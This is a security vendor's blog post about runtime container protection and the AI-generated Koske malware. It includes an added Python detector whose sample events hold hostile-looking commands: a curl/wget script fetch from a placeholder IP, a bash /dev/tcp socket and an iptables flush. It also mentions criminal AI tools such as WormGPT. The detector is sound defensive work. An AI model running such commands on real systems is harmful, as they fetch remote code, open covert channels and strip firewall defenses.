The Aqua Platform offers full lifecycle protection for cloud native workloads, with runtime defenses designed to detect and stop threats like Koske. As part of the platform, Aqua Secure AI extends these protections to AI-powered applications and infrastructure, helping teams monitor and mitigate emerging AI threats. From traditional malware to AI-shaped attacks, Aqua provides the visibility and control needed to secure modern workloads.
Step-by-Step Guide
1. Create a Runtime Policy –
Log in to the Aqua console and go to Workload Protection > Policies > Runtime Policies.
2. Add a Container Runtime Policy –
Click Add Policy, give it a name, and choose Container Runtime Policy from the list.
3. Enable Key Runtime Controls –
Check protections like:
- Block Cryptocurrency Mining
- Block Fileless Execution
- Drift Prevention
4. Set the Enforcement Mode –
Set the Enforcement Mode to Audit to monitor activity or Enforce to actively block malicious behavior.

Runtime policy in the Aqua platform with Block Cryptocurrency Mining, Block Fileless Execution, and Drift Prevention enabled
For more prevention and remediation strategies, including Aqua’s Runtime Protection Policies, visit the Aqua Support Portal.
Koske and Beyond: Analyzing the Rise of AI-Crafted Threats
From the very beginning of this discussion, it’s important to clearly distinguish between two types of threats: attacks targeting AI infrastructure and attacks using AI.
Attacks against AI infrastructure focus on exploiting vulnerabilities, misconfigurations or the supply chain in the AI stack or user interfaces. The goal may be to steal data, manipulate the model’s behavior, or even achieve remote code execution. However, this type is not the focus of today’s discussion; we will address it in the future.
Instead, we’ll explore two other categories: AI-generated malware and AI-powered malware, which are often confused, but fundamentally different.
AI-generated malware refers to malicious scripts or code sequences that have been created by an AI system.
In the case of Koske malware, you can observe detailed code snippets (as well as other markers) within the malware that reveal a highly methodical and meticulous design. The code appears to be crafted by analyzing millions of code examples, blog posts, and forum discussions. The result is malware that anticipates various obstacles and incorporates mechanisms to overcome them, for instance using tools like curl or wget, using native socket operations, modifying firewall rules, and bypassing security defenses.
While none of these techniques are new, what stands out is the systematic and adaptive nature of the Koske code: if A fails, try B; if that fails, move on to C, … till X, Y, or Z, or until the objective is achieved. The Koske malware displays a surprisingly accurate, precise, and complete structure, especially when compared to the many broken or incomplete code snippets typically seen in security research.
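One way to look for the "if A fails, try B" behavior described above from the defender's side, as an added example that is not from Aqua or the original post: it flags a container that uses several distinct download or firewall-changing techniques within a short window. The event tuples, the regex signatures (including `/dev/tcp` as a marker of native socket use), and the 60-second, three-technique thresholds are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Constructed process-execution events (not from a real incident):
# (epoch seconds, container id, command line)
SAMPLE_EVENTS = [
    (1000, "c1", "curl -fsSL http://198.51.100.7/a.sh"),
    (1004, "c1", "wget -qO- http://198.51.100.7/a.sh"),
    (1009, "c1", "bash -c exec 3<>/dev/tcp/198.51.100.7/80"),
    (1012, "c1", "iptables -F"),
    (1000, "c2", "curl -fsS http://localhost:8080/healthz"),
    (1500, "c2", "curl -fsS http://localhost:8080/healthz"),
    (2000, "c3", "wget -q https://example.com/pkg.tar.gz"),
    (9000, "c3", "curl -s https://example.com/pkg.tar.gz"),
]

# Assumed command-line signatures for each technique named in the text.
TECHNIQUES = {
    "curl": re.compile(r"(^|[\s/])curl\s"),
    "wget": re.compile(r"(^|[\s/])wget\s"),
    "raw_socket": re.compile(r"/dev/(tcp|udp)/"),
    "firewall_change": re.compile(r"(^|[\s/])(iptables|nft|ufw)\s"),
}

def classify(cmdline):
    """Return the set of technique names whose signature matches the command line."""
    return {name for name, rx in TECHNIQUES.items() if rx.search(cmdline)}

def find_fallback_chains(events, window=60, min_distinct=3):
    """Map container id -> techniques, where >= min_distinct occur within `window` seconds."""
    by_container = defaultdict(list)
    for ts, cid, cmd in sorted(events):
        for tech in classify(cmd):
            by_container[cid].append((ts, tech))
    alerts = {}
    for cid, hits in by_container.items():
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            seen = {t for _, t in hits[start:end + 1]}
            if len(seen) >= min_distinct and len(seen) > len(alerts.get(cid, [])):
                alerts[cid] = sorted(seen)  # keep the widest chain observed
    return alerts

if __name__ == "__main__":
    for cid, techs in find_fallback_chains(SAMPLE_EVENTS).items():
        print(f"ALERT {cid}: fallback chain {techs}")
```

Containers `c2` and `c3` use a single tool, or two tools hours apart, and are not flagged; only the rapid multi-technique sequence in `c1` is.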
The attack itself contains all the necessary elements for success: stealth (via rootkits), persistence, and defense evasion techniques. But even though AI clearly influenced its design, this is not yet an AI-powered attack.
AI-powered malware, on the other hand, is connected to a live model. It could send execution results to the model in real-time and receive improved or adapted responses based on the actual outcome of the code.
This kind of in-vivo adaptability doesn’t exist in the Koske example, but it’s only a matter of time.
We’re already seeing signs of this future. Open-source offensive security tools, black market tools and underground forums have begun to advertise tools like WormGPT, FraudGPT, and ExploitGPT or PayloadGPT. These represent the next generation of threats: malware that evolves dynamically using AI capabilities.
When this becomes widespread, we’ll need adaptive layers of defense that can detect and block threats driven by AI at their core.
For more detailed information about the AI-generated Koske malware, read our blog: AI-Generated Malware in Panda Image Hides Persistent Linux Threat
Don’t wait for an attack to reveal the gaps
Contact your Aqua Sales Representative or Customer Success Manager today to learn how Aqua Secure AI monitors and mitigates emerging real-world AI threats.

